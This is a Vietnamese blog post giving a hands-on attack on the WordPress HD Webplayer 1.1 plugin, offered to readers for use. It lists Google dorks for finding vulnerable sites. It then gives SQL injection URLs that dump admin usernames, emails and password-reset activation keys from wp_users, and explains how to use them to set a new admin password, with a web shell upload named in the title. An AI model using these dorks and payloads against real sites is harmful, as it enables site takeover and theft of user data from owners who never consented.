J2TEAM Security: A must-have extension for Chrome users. Install now!

Bug + UpShell với Wordpress HD Webplayer 1.1

Bug + UpShell với Wordpress HD Webplayer 1.1 | Juno_okyo's Blog
Tìm site có lỗi:
chép vào google là được
Code:


Quote:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Vidụ ta có web sau:

ta bắt đầu get lấy (Username & Email)

Quote:
http://domain.com/wp-content/plugins....php?videoid=7 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b ),5,6,7,8,9,10,11 FROM wp_users--
lấy email của admin rồi dán vào đây:

tiếp đấy ta lấy key đổi password user_login & user_activation_key)
Quote:
http://domain.com/wp-content/plugins....php?videoid=7 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation _key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Dán user admin & key theo link sau:
sau đó nhập password mới vào... chúc các bác thành công nhé


Video:

Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!